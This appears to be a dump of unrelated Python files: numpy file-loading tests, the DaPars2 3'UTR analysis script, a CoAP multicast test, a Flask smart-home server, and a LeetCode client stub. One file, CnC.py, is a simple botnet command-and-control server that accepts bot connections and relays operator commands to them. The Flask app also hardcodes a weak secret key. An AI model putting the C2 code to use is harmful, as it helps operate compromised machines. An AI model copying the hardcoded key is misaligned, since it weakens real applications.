assert_equal(test, ctrl)
# Test: no delete (spaces are replaced by _)
test = np.genfromtxt(StringIO(txt),
delimiter=",", names=True, dtype=None,
deletechars='')
ctrl_dtype = [("A.A", int), ("B_(B)", int), ("C:C", float)]
ctrl = np.array((1, 2, 3.14), dtype=ctrl_dtype)
assert_equal(test, ctrl)
def test_incomplete_names(self):
"Test w/ incomplete names"
data = "A,,C\n0,1,2\n3,4,5"
kwargs = dict(delimiter=",", names=True)
# w/ dtype=None
ctrl = np.array([(0, 1, 2), (3, 4, 5)],
dtype=[(_, int) for _ in ('A', 'f0', 'C')])
test = np.ndfromtxt(StringIO(data), dtype=None, **kwargs)
assert_equal(test, ctrl)
# w/ default dtype
ctrl = np.array([(0, 1, 2), (3, 4, 5)],
dtype=[(_, float) for _ in ('A', 'f0', 'C')])
test = np.ndfromtxt(StringIO(data), **kwargs)
assert_equal(test, ctrl)
def test_names_auto_completion(self):
"Make sure that names are properly completed"
data = "1 2 3\n 4 5 6"
test = np.genfromtxt(StringIO(data),
dtype=(int, float, int), names="a")
ctrl = np.array([(1, 2, 3), (4, 5, 6)],
dtype=[('a', int), ('f0', float), ('f1', int)])
assert_equal(test, ctrl)
def test_names_with_usecols_bug1636(self):
"Make sure we pick up the right names w/ usecols"
data = "A,B,C,D,E\n0,1,2,3,4\n0,1,2,3,4\n0,1,2,3,4"
ctrl_names = ("A", "C", "E")
test = np.genfromtxt(StringIO(data),
dtype=(int, int, int), delimiter=",",
usecols=(0, 2, 4), names=True)
assert_equal(test.dtype.names, ctrl_names)
#
test = np.genfromtxt(StringIO(data),
dtype=(int, int, int), delimiter=",",
usecols=("A", "C", "E"), names=True)
assert_equal(test.dtype.names, ctrl_names)
#
test = np.genfromtxt(StringIO(data),
dtype=int, delimiter=",",
usecols=("A", "C", "E"), names=True)
assert_equal(test.dtype.names, ctrl_names)
def test_fixed_width_names(self):
"Test fix-width w/ names"
data = " A B C\n 0 1 2.3\n 45 67 9."
kwargs = dict(delimiter=(5, 5, 4), names=True, dtype=None)
ctrl = np.array([(0, 1, 2.3), (45, 67, 9.)],
dtype=[('A', int), ('B', int), ('C', float)])
test = np.ndfromtxt(StringIO(data), **kwargs)
assert_equal(test, ctrl)
#
kwargs = dict(delimiter=5, names=True, dtype=None)
ctrl = np.array([(0, 1, 2.3), (45, 67, 9.)],
dtype=[('A', int), ('B', int), ('C', float)])
test = np.ndfromtxt(StringIO(data), **kwargs)
assert_equal(test, ctrl)
def test_filling_values(self):
"Test missing values"
data = "1, 2, 3\n1, , 5\n0, 6, \n"
kwargs = dict(delimiter=",", dtype=None, filling_values= -999)
ctrl = np.array([[1, 2, 3], [1, -999, 5], [0, 6, -999]], dtype=int)
test = np.ndfromtxt(StringIO(data), **kwargs)
assert_equal(test, ctrl)
def test_recfromtxt(self):
#
data = StringIO('A,B\n0,1\n2,3')
kwargs = dict(delimiter=",", missing_values="N/A", names=True)
test = np.recfromtxt(data, **kwargs)
control = np.array([(0, 1), (2, 3)],
dtype=[('A', np.int), ('B', np.int)])
self.assertTrue(isinstance(test, np.recarray))
assert_equal(test, control)
#
data = StringIO('A,B\n0,1\n2,N/A')
test = np.recfromtxt(data, dtype=None, usemask=True, **kwargs)
control = ma.array([(0, 1), (2, -1)],
mask=[(False, False), (False, True)],
dtype=[('A', np.int), ('B', np.int)])
assert_equal(test, control)
assert_equal(test.mask, control.mask)
assert_equal(test.A, [0, 2])
def test_recfromcsv(self):
#
data = StringIO('A,B\n0,1\n2,3')
kwargs = dict(missing_values="N/A", names=True, case_sensitive=True)
test = np.recfromcsv(data, dtype=None, **kwargs)
control = np.array([(0, 1), (2, 3)],
dtype=[('A', np.int), ('B', np.int)])
self.assertTrue(isinstance(test, np.recarray))
assert_equal(test, control)
#
data = StringIO('A,B\n0,1\n2,N/A')
test = np.recfromcsv(data, dtype=None, usemask=True, **kwargs)
control = ma.array([(0, 1), (2, -1)],
mask=[(False, False), (False, True)],
dtype=[('A', np.int), ('B', np.int)])
assert_equal(test, control)
assert_equal(test.mask, control.mask)
assert_equal(test.A, [0, 2])
#
data = StringIO('A,B\n0,1\n2,3')
test = np.recfromcsv(data, missing_values='N/A',)
control = np.array([(0, 1), (2, 3)],
dtype=[('a', np.int), ('b', np.int)])
self.assertTrue(isinstance(test, np.recarray))
assert_equal(test, control)
def test_gzip_load():
a = np.random.random((5, 5))
s = StringIO()
f = gzip.GzipFile(fileobj=s, mode="w")
np.save(f, a)
f.close()
s.seek(0)
f = gzip.GzipFile(fileobj=s, mode="r")
assert_array_equal(np.load(f), a)
def test_gzip_loadtxt():
# Thanks to another windows brokeness, we can't use
# NamedTemporaryFile: a file created from this function cannot be
# reopened by another open call. So we first put the gzipped string
# of the test reference array, write it to a securely opened file,
# which is then read from by the loadtxt function
s = StringIO()
g = gzip.GzipFile(fileobj=s, mode='w')
g.write(asbytes('1 2 3\n'))
g.close()
s.seek(0)
f, name = mkstemp(suffix='.gz')
try:
os.write(f, s.read())
s.close()
assert_array_equal(np.loadtxt(name), [1, 2, 3])
finally:
os.close(f)
os.unlink(name)
def test_gzip_loadtxt_from_string():
s = StringIO()
f = gzip.GzipFile(fileobj=s, mode="w")
f.write(asbytes('1 2 3\n'))
f.close()
s.seek(0)
f = gzip.GzipFile(fileobj=s, mode="r")
assert_array_equal(np.loadtxt(f), [1, 2, 3])
def test_npzfile_dict():
s = StringIO()
x = np.zeros((3, 3))
y = np.zeros((3, 3))
np.savez(s, x=x, y=y)
s.seek(0)
z = np.load(s)
assert 'x' in z
assert 'y' in z
assert 'x' in z.keys()
assert 'y' in z.keys()
for f, a in z.items():
assert f in ['x', 'y']
assert_equal(a.shape, (3, 3))
assert len(z.items()) == 2
for f in z:
assert f in ['x', 'y']
assert 'x' in list(z.keys())
if __name__ == "__main__":
run_module_suite()
|
Dapars2_Multi_Sample.py
|
import numpy as np
import os
import sys
import datetime
import threading
import scipy as sp
import scipy.stats
from multiprocessing import Pool
from bisect import bisect
import math
import time
import multiprocessing
def time_now():  # return the current time as a formatted string
curr_time = datetime.datetime.now()
return curr_time.strftime("%c")
def Convert_wig_into_bp_coverage(extracted_coverage,extracted_3UTR_region,strand_info):
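# Expand the run-length (wig-style) representation -- parallel lists of region
# boundaries and per-region coverage values -- into a per-base-pair coverage array
# over the 3'UTR, reversed for minus-strand transcripts so that the array runs in
# transcript orientation.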
bp_coverage = np.zeros(extracted_3UTR_region[-1] - extracted_3UTR_region[0])
relative_start = extracted_3UTR_region[0]
for i in range(len(extracted_coverage)):
curr_region_start = extracted_3UTR_region[i] - relative_start
curr_region_end = extracted_3UTR_region[i+1] - relative_start
bp_coverage[curr_region_start:curr_region_end] = extracted_coverage[i]
if strand_info == '-':
bp_coverage = bp_coverage[::-1]
return bp_coverage
def parse_cfgfile(cfg_file):
'''Parse configure file
'''
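# A minimal sketch of the expected key=value configure file (file names and values
# here are hypothetical, for illustration only):
#   Aligned_Wig_files=sample_1.wig,sample_2.wig
#   Output_directory=DaPars2_output/
#   Annotated_3UTR=annotated_3UTR.bed
#   Output_result_file=DaPars2
#   sequencing_depth_file=sequencing_depths.txt
#   Num_Threads=4
#   Coverage_threshold=10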
Aligned_Wig_files=''
output_directory=''
Annotated_3UTR_file=''
Output_result_file=''
Coverage_threshold = 1
Num_threads = 1
sequencing_depth_file = ''
for line in open(cfg_file, 'r'):
if line[0] == '\n' or line[0] == '#':
comments = line;
else:
line = line.rstrip()
command = line.split('=');
if command[0] == 'Aligned_Wig_files':
Aligned_Wig_files = command[1].split(',');
if command[0] == 'Output_directory':
output_directory = command[1]
if output_directory[-1] != '/':
output_directory += '/'
if command[0] == 'Annotated_3UTR':
Annotated_3UTR_file = command[1]
if command[0] == 'Output_result_file':
Output_result_file = command[1]
if command[0] == 'sequencing_depth_file':
sequencing_depth_file = command[1]
if command[0] == 'Num_Threads':
Num_threads = int(command[1])
if command[0] == 'Coverage_threshold':
Coverage_threshold = int(command[1])
if Aligned_Wig_files == '':
print("No aligned BAM file found!", file=sys.stderr)
exit(1)
if output_directory=='':
print("No output directory!", file=sys.stderr)
exit(1)
if Annotated_3UTR_file=='':
print("No annotated 3' UTR file!", file=sys.stderr)
exit(1)
if Output_result_file=='':
print("No result file name!", file=sys.stderr)
exit(1)
if sequencing_depth_file=='':
print("No sequencing depth file!", file=sys.stderr)
exit(1)
return Aligned_Wig_files, output_directory, Annotated_3UTR_file, Output_result_file, sequencing_depth_file, Num_threads, Coverage_threshold
def load_sequencing_depth(depth_file):
seq_depth_list = []
for line in open(depth_file, 'r'):
fields = line.strip('\n').split('\t')
seq_depth_list.append(int(fields[-1]))
return np.array(seq_depth_list)
def De_Novo_3UTR_Identification_Loading_Target_Wig_for_TCGA_Multiple_Samples_Multiple_threads_Main3_shared_list(argv=None):
'''multiple threads version
'''
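# Overall flow: parse the configure file, load per-sample wig coverage for the
# requested chromosome into a shared dict, normalise by relative sequencing depth,
# split the 3'UTR events across worker processes, let each worker write its PDUI
# estimates to a temporary file, then concatenate the per-worker results.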
if len(sys.argv) == 1:
print("Please provide the configure file and specify chr name...")
exit(1)
cfg_file = sys.argv[1]
curr_processing_chr = sys.argv[2]
print("[%s] Start Analysis ..." % time_now(), file=sys.stderr)
Group1_Tophat_aligned_file, output_directory, Annotated_3UTR_file, Output_result_file, sequencing_depth_file, Num_threads, Coverage_threshold = parse_cfgfile(cfg_file)
All_Sample_files = Group1_Tophat_aligned_file[:]
Sample_name = []
for sample in All_Sample_files:
sample_name = sample.rsplit('.',1)[0]
Sample_name.append(sample_name)
##Prepare output directory
output_directory = output_directory.strip('/') + '_' + curr_processing_chr + '/'
d = os.path.dirname(output_directory)
if not os.path.exists(d):
os.makedirs(d)
temp_dir = d + '/tmp/'
if not os.path.exists(temp_dir):
os.makedirs(temp_dir)
Output_all_prediction_file = output_directory + Output_result_file + '_result_temp.' + curr_processing_chr + '.txt'
Output_result = open(Output_all_prediction_file, 'w')
num_samples = len(All_Sample_files)
print("All samples Joint Processing %s ..." % curr_processing_chr, file=sys.stderr)
print("[%s] Loading Coverage ..." % time_now(), file=sys.stderr)
All_samples_Target_3UTR_coverages, UTR_events_dict = Load_Target_Wig_files_Multiple_threads_shared_dict_sampleid_key(All_Sample_files, Annotated_3UTR_file, Num_threads,curr_processing_chr)
All_samples_sequencing_depths = load_sequencing_depth(sequencing_depth_file)
print(All_samples_sequencing_depths)
All_sample_coverage_weights = All_samples_sequencing_depths/np.mean(All_samples_sequencing_depths)
#print All_sample_coverage_weights
print("[%s] Loading Coverage Finished ..." % time_now(), file=sys.stderr)
#Write the first line
first_line = ['Gene','fit_value','Predicted_Proximal_APA','Loci']
for i in range(num_samples):
#curr_long_exp = 'Sample_%s_long_exp' % str(i+1)
#curr_short_exp = 'Sample_%s_short_exp' % str(i+1)
curr_ratio = '%s_PDUI' % str(Sample_name[i])
#first_line.extend([curr_long_exp,curr_short_exp,curr_ratio])
first_line.append(curr_ratio)
Output_result.writelines('\t'.join(first_line) + '\n')
All_events_ids = list(UTR_events_dict.keys())
num_threads = Num_threads
Assigned_events_ids_all_threads = Assign_to_different_processor_balance_events(All_events_ids, num_threads)
num_real_threads = len(Assigned_events_ids_all_threads)
Output_each_processor_all = []
for i in range(num_real_threads):
curr_temp_output = temp_dir + 'Each_processor_3UTR_Result_%s.txt' % (str(i+1))
Output_each_processor_all.append(curr_temp_output)
processes = []
for i in range(num_real_threads):
process = multiprocessing.Process(target=Each_Thread_3UTR_estimation_list_version_sample_ids, args=(Assigned_events_ids_all_threads[i], UTR_events_dict, All_sample_coverage_weights, num_samples, Output_each_processor_all[i], All_samples_Target_3UTR_coverages, Coverage_threshold))
process.start()
processes.append(process)
for p in processes:
p.join()
#Combine results
for i in range(num_real_threads):
curr_result = Output_each_processor_all[i]
for line in open(curr_result, 'r'):
Output_result.writelines(line)
Output_result.close()
#print >> sys.stderr, "[%s] Filtering the Results ..." % time_now()
#Output_all_filtered_prediction_file = output_directory + Output_result_file + '_results_final.' + curr_processing_chr + '.txt'
#Dapars_Filtering(Output_all_prediction_file, num_samples, Output_all_filtered_prediction_file)
print("[%s] Finished!" % time_now(), file=sys.stderr)
def Each_Thread_3UTR_estimation_list_version_sample_ids(curr_thread_UTR_events_ids, UTR_events_dict, All_sample_coverage_weights, num_samples, Output_result_file, All_samples_coverage_shared_dict, Coverage_threshold):
Output_result = open(Output_result_file,'w')
for curr_3UTR_id in curr_thread_UTR_events_ids:
curr_3UTR_structure = UTR_events_dict[curr_3UTR_id]
region_start = curr_3UTR_structure[1]
region_end = curr_3UTR_structure[2]
curr_strand = curr_3UTR_structure[-2]
UTR_pos = curr_3UTR_structure[-1]
curr_3UTR_all_samples_bp_coverage = []
for i in range(num_samples):
curr_sample_curr_3UTR_coverage_wig = All_samples_coverage_shared_dict[curr_3UTR_id, i]
curr_3UTR_curr_sample_bp_coverage = Convert_wig_into_bp_coverage(curr_sample_curr_3UTR_coverage_wig[0], curr_sample_curr_3UTR_coverage_wig[1], curr_strand)
curr_3UTR_all_samples_bp_coverage.append(curr_3UTR_curr_sample_bp_coverage)
select_mean_squared_error, selected_break_point, UTR_abundances = De_Novo_3UTR_Coverage_estimation_Genome_for_multiple_samples(curr_3UTR_all_samples_bp_coverage, region_start, region_end,curr_strand,All_sample_coverage_weights, Coverage_threshold)
if str(select_mean_squared_error) != "Na":
num_non_zero = 1
if num_non_zero > 0:
All_long_inclusion_ratios = []
line_write = [curr_3UTR_id, "%.1f" % select_mean_squared_error, str(selected_break_point), UTR_pos]
for i in range(num_samples):
if UTR_abundances[0][i] != 'NA':
# long 3'UTR percentage
curr_sample_ratio = float(UTR_abundances[0][i])/(float(UTR_abundances[0][i]) + float(UTR_abundances[1][i]))
All_long_inclusion_ratios.append(curr_sample_ratio)
#line_write.append("%.2f" % UTR_abundances[0][i])#long 3' UTR abundance
#line_write.append("%.2f" % UTR_abundances[1][i])#short 3' UTR abundance
line_write.append("%.2f" % curr_sample_ratio)
else:
line_write.extend(['NA']*1)
Output_result.writelines( '\t'.join(line_write) + '\n')
Output_result.close()
def De_Novo_3UTR_Coverage_estimation_Genome_for_multiple_samples(All_Samples_curr_3UTR_coverages, UTR_start, UTR_end, curr_strand, weight_for_second_coverage, Coverage_threshold):
coverage_threshold = Coverage_threshold
search_point_start = 150 ##200
search_point_end = int(abs((UTR_end - UTR_start))*0.05)
num_samples = len(All_Samples_curr_3UTR_coverages)
#Read Coverage
Region_Coverages = []
Pass_threshold_index = []
for i in range(num_samples):
curr_Region_Coverage_raw = All_Samples_curr_3UTR_coverages[i]
curr_Region_Coverage = curr_Region_Coverage_raw/weight_for_second_coverage[i]#@xdzou: not modified yet
curr_first_100_coverage = np.mean(curr_Region_Coverage_raw[0:99])
if curr_first_100_coverage > coverage_threshold:
Pass_threshold_index.append(i)
Region_Coverages.append(curr_Region_Coverage)
least_pass_coverage_num = num_samples * least_pass_coverage_percentage
if len(Pass_threshold_index) > least_pass_coverage_num and UTR_end - UTR_start >=150:
if curr_strand == "+":
search_region = list(range(UTR_start+search_point_start, UTR_end-search_point_end+1))
else:
search_region = list(range(UTR_end - search_point_start, UTR_start+search_point_end-1, -1))
search_region_start = search_point_start
search_region_end = UTR_end - UTR_start - search_point_end
Mean_squared_error_list = []
Estimated_3UTR_abundance_list = []
for curr_point in range(search_region_start, search_region_end+1):
curr_search_point = curr_point
All_samples_result = [[],[],[]]
for curr_sample_region_coverage in Region_Coverages:
Mean_Squared_error, Long_UTR_abun, Short_UTR_abun = Estimation_abundance(curr_sample_region_coverage, curr_search_point)
All_samples_result[0].append(Mean_Squared_error)
All_samples_result[1].append(Long_UTR_abun)
All_samples_result[2].append(Short_UTR_abun)
Mean_Squared_error = np.mean(np.array(All_samples_result[0]))
Mean_squared_error_list.append(Mean_Squared_error)
Estimated_3UTR_abundance_list.append([All_samples_result[1],All_samples_result[2]])
if len(Mean_squared_error_list) > 1:
min_ele_index = Mean_squared_error_list.index(min(Mean_squared_error_list))
select_mean_squared_error = Mean_squared_error_list[min_ele_index]
selected_break_point = search_region[min_ele_index]
UTR_abundances = [['NA']*num_samples, ['NA']*num_samples]
UTR_abundances_passed = Estimated_3UTR_abundance_list[min_ele_index]
for k in range(len(Pass_threshold_index)):
UTR_abundances[0][Pass_threshold_index[k]] = UTR_abundances_passed[0][k]
UTR_abundances[1][Pass_threshold_index[k]] = UTR_abundances_passed[1][k]
else:
selected_break_point = 'Na'
UTR_abundances = 'Na'
select_mean_squared_error = 'Na'
else:
selected_break_point = 'Na'
UTR_abundances = 'Na'
select_mean_squared_error = 'Na'
return select_mean_squared_error, selected_break_point, UTR_abundances
def Estimation_abundance(Region_Coverage, break_point):
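# Fit a two-segment step model at the candidate break point: coverage after the
# break point is summarised by its mean (long-3'UTR abundance), coverage before it
# by its mean in excess of that value (short-3'UTR abundance, floored at zero), and
# the mean squared residual of this piecewise-constant fit is returned alongside the
# two abundance estimates.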
Long_UTR_abun = np.mean(Region_Coverage[break_point:])
Short_UTR_abun = np.mean(Region_Coverage[0:break_point] - Long_UTR_abun)
if Short_UTR_abun < 0:
Short_UTR_abun = 0
Coverage_diff = Region_Coverage[0:break_point] - Long_UTR_abun - Short_UTR_abun
Coverage_diff= np.append(Coverage_diff, Region_Coverage[break_point:] - Long_UTR_abun)
Mean_Squared_error = np.mean(Coverage_diff**2)
return Mean_Squared_error, Long_UTR_abun, Short_UTR_abun
def Load_Target_Wig_files_Multiple_threads_shared_dict_sampleid_key(All_Wig_files,UTR_Annotation_file, num_threads,curr_processing_chr):
num_samples = len(All_Wig_files)
UTR_events_dict = {}
for line in open(UTR_Annotation_file, 'r'):
fields = line.strip('\n').split('\t')
curr_chr = fields[0]
if curr_chr == curr_processing_chr:
region_start = fields[1]
region_end = fields[2]
curr_strand = fields[-1]
UTR_pos = "%s:%s-%s" %(curr_chr, region_start, region_end)
end_shift = int(round(abs(int(region_start) - int(region_end)) * 0.2))
if curr_strand == "+":
region_end = str(int(region_end) - end_shift)
else:
region_start = str(int(region_start) + end_shift)
region_start = int(region_start) + 1
region_end = int(region_end) - 1
if region_start + 50 < region_end:
UTR_events_dict[fields[3]] = [fields[0],region_start,region_end,fields[-1],UTR_pos]
Assigned_index = Assign_to_different_processor_balance(num_samples, num_threads)
manager = multiprocessing.Manager() # create only 1 Manager
All_samples_extracted_3UTR_coverage_dict = manager.dict() # create only 1 dict
processes = []
Final_assigned_threads_num = len(Assigned_index)
for i in range(Final_assigned_threads_num):
process = multiprocessing.Process(target=load_wig_funct_shared_dict_sampleid_key, args=(All_Wig_files, Assigned_index[i], UTR_events_dict,curr_processing_chr,All_samples_extracted_3UTR_coverage_dict))
process.start()
processes.append(process)
for p in processes:
p.join()
return All_samples_extracted_3UTR_coverage_dict, UTR_events_dict
def load_wig_funct_shared_dict_sampleid_key(All_wig_files, assigned_indexes,UTR_events_dict, curr_processing_chr, All_samples_extracted_3UTR_coverage_dict):
'''
All_samples_extracted_3UTR_coverage_dict: keyed by (3'UTR event id, sample index) tuples.
'''
for i in assigned_indexes:
curr_wig_file = All_wig_files[i]
print(curr_wig_file, file=sys.stderr)
curr_sample_All_chroms_coverage_dict = {}
with open(curr_wig_file, 'r') as fin:
for line in fin:
if line[0] != '#' and line[0] != 't':
fields = line.strip('\n').split('\t')
chrom_name = fields[0]
if chrom_name == curr_processing_chr:
region_start = int(fields[1])
region_end = int(fields[2])
if chrom_name not in curr_sample_All_chroms_coverage_dict:
curr_sample_All_chroms_coverage_dict[chrom_name] = [[0],[0]]
if region_start > curr_sample_All_chroms_coverage_dict[chrom_name][0][-1]:
curr_sample_All_chroms_coverage_dict[chrom_name][0].append(region_start)
curr_sample_All_chroms_coverage_dict[chrom_name][1].append(0)
curr_sample_All_chroms_coverage_dict[chrom_name][0].append(region_end)
curr_sample_All_chroms_coverage_dict[chrom_name][1].append(int(float(fields[-1])))
else:
if len(curr_sample_All_chroms_coverage_dict)>0:
break
fin.close()
if curr_processing_chr not in curr_sample_All_chroms_coverage_dict:
print('no wig: ' + curr_wig_file, file=sys.stderr)
else:
curr_sample_All_chroms_coverage_dict[curr_processing_chr][1].append(0)
curr_sample_coverage_dict = {}
for curr_3UTR_event_id in UTR_events_dict:
curr_3UTR_structure = UTR_events_dict[curr_3UTR_event_id]
curr_chr_local = curr_3UTR_structure[0]
if curr_chr_local in curr_sample_All_chroms_coverage_dict:
curr_chr_coverage = curr_sample_All_chroms_coverage_dict[curr_chr_local]
region_start = curr_3UTR_structure[1]
region_end = curr_3UTR_structure[2]
left_region_index = bisect(curr_chr_coverage[0],region_start)
right_region_index = bisect(curr_chr_coverage[0],region_end)
extracted_coverage = curr_chr_coverage[1][left_region_index:right_region_index+1]
extracted_3UTR_region = curr_chr_coverage[0][left_region_index:right_region_index]
extracted_3UTR_region.insert(0,region_start)
extracted_3UTR_region.append(region_end)
curr_event_info = [extracted_coverage,extracted_3UTR_region]
All_samples_extracted_3UTR_coverage_dict[curr_3UTR_event_id,i] = curr_event_info
def Assign_to_different_processor_balance(Total_number, num_processors):
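# Split the indices 0..Total_number-1 into num_processors contiguous chunks whose
# sizes differ by at most one; the first `remain` chunks get the extra element.
# For example, Total_number=10 with num_processors=3 yields
# [[0, 1, 2, 3], [4, 5, 6], [7, 8, 9]].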
Assigned_results = []
num_each_processor = int(Total_number/num_processors)  # @xdzou: add int() to convert the value into an integer, otherwise it would be a float
if num_each_processor == 0:
for i in range(Total_number):
Assigned_results.append([i])
else:
remain = Total_number - num_processors * num_each_processor
for i in range(remain):
Assigned_results.append(list(range((i)*(num_each_processor + 1), (i+1)*(num_each_processor + 1))))
for i in range(num_processors-remain):
Assigned_results.append(list(range(i*num_each_processor+remain*(num_each_processor+1), (i+1)*num_each_processor+remain*(num_each_processor+1))))
return Assigned_results
def Assign_to_different_processor_balance_events(All_events_ids, num_processors):
Assigned_results = []
Total_number = len(All_events_ids)
num_each_processor = int(Total_number/num_processors) #@xdzou, add int()
if num_each_processor == 0:
for i in range(Total_number):
Assigned_results.append([i])
else:
remain = Total_number - num_processors * num_each_processor
for i in range(remain):
Assigned_results.append(list(range((i)*(num_each_processor+1), (i+1)*(num_each_processor+1))))
for i in range(num_processors-remain):
Assigned_results.append(list(range(i*num_each_processor+remain*(num_each_processor+1), (i+1)*num_each_processor+remain*(num_each_processor+1))))
#print assigned Results
Assigned_events = []
print('#assigned events:')
for curr_processor_inds in Assigned_results:
curr_processor_events = []
print(len(curr_processor_inds))
for curr_ele in curr_processor_inds:
curr_processor_events.append(All_events_ids[curr_ele])
Assigned_events.append(curr_processor_events)
return Assigned_events
#global parameters
least_pass_coverage_percentage = 0.3
De_Novo_3UTR_Identification_Loading_Target_Wig_for_TCGA_Multiple_Samples_Multiple_threads_Main3_shared_list(sys.argv)
|
coverage_test_multicast.py
|
from queue import Queue
import random
import threading
import unittest
from coapclient import HelperClient
from coapserver import CoAPServer
from coapthon import defines
from coapthon.messages.message import Message
from coapthon.messages.option import Option
from coapthon.messages.request import Request
from coapthon.messages.response import Response
__author__ = 'Giacomo Tanganelli'
__version__ = "2.0"
class Tests(unittest.TestCase):
def setUp(self):
self.server_address = (defines.ALL_COAP_NODES, 5683)
self.current_mid = random.randint(1, 1000)
self.server_mid = random.randint(1000, 2000)
self.server = CoAPServer("0.0.0.0", 5683, multicast=True)
self.server_thread = threading.Thread(target=self.server.listen, args=(10,))
self.server_thread.start()
self.queue = Queue()
def tearDown(self):
self.server.close()
self.server_thread.join(timeout=25)
self.server = None
def _test_with_client(self, message_list): # pragma: no cover
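# Drive the server with a list of (request, expected_response) pairs: each request
# is sent through a HelperClient and the received message is compared field by
# field (type, mid, code, source, token, payload and options) against the non-None
# fields of the expected response.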
client = HelperClient(self.server_address)
for message, expected in message_list:
if message is not None:
received_message = client.send_request(message)
if expected is not None:
if expected.type is not None:
self.assertEqual(received_message.type, expected.type)
if expected.mid is not None:
self.assertEqual(received_message.mid, expected.mid)
self.assertEqual(received_message.code, expected.code)
if expected.source is not None:
self.assertEqual(received_message.source, self.server_address)
if expected.token is not None:
self.assertEqual(received_message.token, expected.token)
if expected.payload is not None:
self.assertEqual(received_message.payload, expected.payload)
if expected.options:
self.assertEqual(len(received_message.options), len(expected.options))
for o in expected.options:
assert isinstance(o, Option)
option_value = getattr(expected, o.name.lower().replace("-", "_"))
option_value_rec = getattr(received_message, o.name.lower().replace("-", "_"))
self.assertEqual(option_value, option_value_rec)
client.stop()
def _test_with_client_observe(self, message_list): # pragma: no cover
client = HelperClient(self.server_address)
for message, expected in message_list:
if message is not None:
client.send_request(message, self.client_callback)
if expected is not None:
received_message = self.queue.get()
if expected.type is not None:
self.assertEqual(received_message.type, expected.type)
if expected.mid is not None:
self.assertEqual(received_message.mid, expected.mid)
self.assertEqual(received_message.code, expected.code)
if expected.source is not None:
self.assertEqual(received_message.source, self.server_address)
if expected.token is not None:
self.assertEqual(received_message.token, expected.token)
if expected.payload is not None:
self.assertEqual(received_message.payload, expected.payload)
if expected.options:
self.assertEqual(len(received_message.options), len(expected.options))
for o in expected.options:
assert isinstance(o, Option)
option_value = getattr(expected, o.name.lower().replace("-", "_"))
option_value_rec = getattr(received_message, o.name.lower().replace("-", "_"))
self.assertEqual(option_value, option_value_rec)
client.stop()
def client_callback(self, response):
print("Callback")
self.queue.put(response)
def test_not_allowed(self):
print("TEST_NOT_ALLOWED")
path = "/void"
req = Request()
req.code = defines.Codes.GET.number
req.uri_path = path
req.type = defines.Types["CON"]
req._mid = self.current_mid
req.destination = self.server_address
expected = Response()
expected.type = defines.Types["ACK"]
expected._mid = self.current_mid
expected.code = defines.Codes.METHOD_NOT_ALLOWED.number
expected.token = None
exchange1 = (req, expected)
self.current_mid += 1
req = Request()
req.code = defines.Codes.POST.number
req.uri_path = path
req.type = defines.Types["CON"]
req._mid = self.current_mid
req.destination = self.server_address
expected = Response()
expected.type = defines.Types["ACK"]
expected._mid = self.current_mid
expected.code = defines.Codes.METHOD_NOT_ALLOWED.number
expected.token = None
exchange2 = (req, expected)
self.current_mid += 1
req = Request()
req.code = defines.Codes.PUT.number
req.uri_path = path
req.type = defines.Types["CON"]
req._mid = self.current_mid
req.destination = self.server_address
expected = Response()
expected.type = defines.Types["ACK"]
expected._mid = self.current_mid
expected.code = defines.Codes.METHOD_NOT_ALLOWED.number
expected.token = None
exchange3 = (req, expected)
self.current_mid += 1
req = Request()
req.code = defines.Codes.DELETE.number
req.uri_path = path
req.type = defines.Types["CON"]
req._mid = self.current_mid
req.destination = self.server_address
expected = Response()
expected.type = defines.Types["ACK"]
expected._mid = self.current_mid
expected.code = defines.Codes.METHOD_NOT_ALLOWED.number
expected.token = None
exchange4 = (req, expected)
self.current_mid += 1
self._test_with_client([exchange1, exchange2, exchange3, exchange4])
if __name__ == '__main__':
unittest.main()
|
main.py
|
from gpio import setup_gpio
from gpio import close_gpio
from climate import Climate
from state import HouseState
from control import mqtthread
from control import sensor_pollings
from control import register_device
from control import handle_button
from control import toggle_client_output
from control import toggle_alarm
from logger import Logger
from mqtt import MqttClient
from flask import Flask, render_template
from flask_socketio import SocketIO, emit
import threading
import signal
import sys
import csv
def cleanup(signum, frame):
close_gpio()
sys.exit(0)
signal.signal(signal.SIGINT, cleanup)
app = Flask(__name__)
app.config['SECRET_KEY'] = 'secret!'
socketio = SocketIO(app)
import logging
logging.getLogger('werkzeug').setLevel(logging.ERROR)
@app.route('/')
def index():
state = HouseState.get_instance()
state_data = {
"alarm": "Ativado" if state.alarm else "Desativado",
"alarmButton": "Desativar" if state.alarm else "Ativar"
}
devices = []
try:
with open("data/devices.csv") as devices_csv:
reader = csv.reader(devices_csv)
for row in reader:
devices.append({"room": row[0], "in": row[1], "out": row[2]})
except FileNotFoundError:
with open("data/devices.csv", "w") as devices_csv:
pass
return render_template('index.html', devices=devices, state=state_data)
@socketio.on('button')
def handle_button_event(data):
handle_button(data)
@socketio.on('register')
def register_device_event(data):
register_device(data, socketio)
@socketio.on('remoteOut')
def toggle_client_output_event(data):
toggle_client_output(data, socketio)
@socketio.on('toggleAlarm')
def toggle_alarm_event(data):
toggle_alarm(data, socketio)
def main():
logger = Logger.get_instance()
state = HouseState.get_instance()
setup_gpio()
t1 = threading.Thread(target=mqtthread, args=(socketio,), daemon=True)
t1.start()
t2 = threading.Thread(target=sensor_pollings, args=(socketio,), daemon=True)
t2.start()
if __name__ == "__main__":
main()
socketio.run(app, port=10103)
|
CnC.py
|
import socket
from threading import Thread
import time
threads = []
clients = []
def listen_for_bots(port):
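# Accept a single incoming bot connection on the given port and append its socket
# to the shared clients list; main() starts one listener thread per expected bot.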
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind(("", port))
sock.listen()
bot, bot_address = sock.accept()
clients.append(bot)
def main():
print("[+] Server bot waiting for incoming connections")
starting_port = 8085
bots = 3
for i in range(bots):
t = Thread(target=listen_for_bots, args=(i + starting_port,), daemon=True)
threads.append(t)
t.start()
# bot, bot_address = s.accept()
run_cnc = True
while run_cnc:
if len(clients) != 0:
for i, c in enumerate(clients):
print("\t\t", i, "\t", c.getpeername())
selected_client = int(input("[+] Select client by index: "))
bot = clients[selected_client]
run_bot = True
while run_bot:
msg = input("[+] Enter Msg: ")
msg = msg.encode()
bot.send(msg)
if msg.decode() == "exit":
run_bot = False
status = bot.recv(1024)
if status == "disconnected".encode():
bot.close()
clients.remove(bot)
print("data sent")
else:
print("[+] No clients connected")
ans = input("[+] Do you want to exit? press [y/n] ")
if ans == "y":
run_cnc = False
else:
run_cnc = True
if __name__ == "__main__":
main()
|
terminal.py
|
import sys
import time
import logging
from threading import Thread
import urwid
from .leetcode import Leetcode, Quiz
from views.home import HomeView
from views.detail import DetailView
from views.help import HelpView
from views.loading import *
